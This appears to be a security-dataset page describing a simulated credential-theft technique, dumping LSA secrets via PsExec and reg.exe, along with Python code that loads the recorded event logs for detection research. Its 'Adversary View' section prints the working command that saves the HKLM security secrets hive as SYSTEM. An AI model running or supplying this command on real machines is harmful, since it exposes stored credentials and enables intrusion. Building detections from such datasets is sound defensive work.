Psexec Reg LSA Secrets Dump

Metadata

Contributors: Roberto Rodriguez @Cyb3rWard0g
Creation Date: 2020/10/19
Modification Date: 2020/10/19
Tactics: TA0006
Techniques: T1003.004
Tags: art.55295ab0-a703-433b-9ca4-ae13807de12f

Dataset Description

This dataset represents adversaries using PsExec to run reg.exe as SYSTEM and dump LSA secrets by saving the registry key HKLM\security\policy\secrets to a file.

Simulation Metadata

Tools

type    Name    Module
Manual  Cmd     Cmd

Adversary View

C:\Users\wardog\Downloads\PSTools>PsExec.exe -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


The operation completed successfully.
reg exited on WORKSTATION5 with error code 0.

C:\Users\wardog\Downloads\PSTools>

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

# Fetch the zipped dataset and extract the first (only) JSON-lines file it contains
url = 'https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_psexec_lsa_secrets_dump.zip'
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

import pandas as pd

# The dataset is newline-delimited JSON (one event per line), hence lines=True
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

# Count events per log channel to see which sources (Sysmon, Security, ...) the dataset covers
df.groupby(['Channel']).size().sort_values(ascending=False)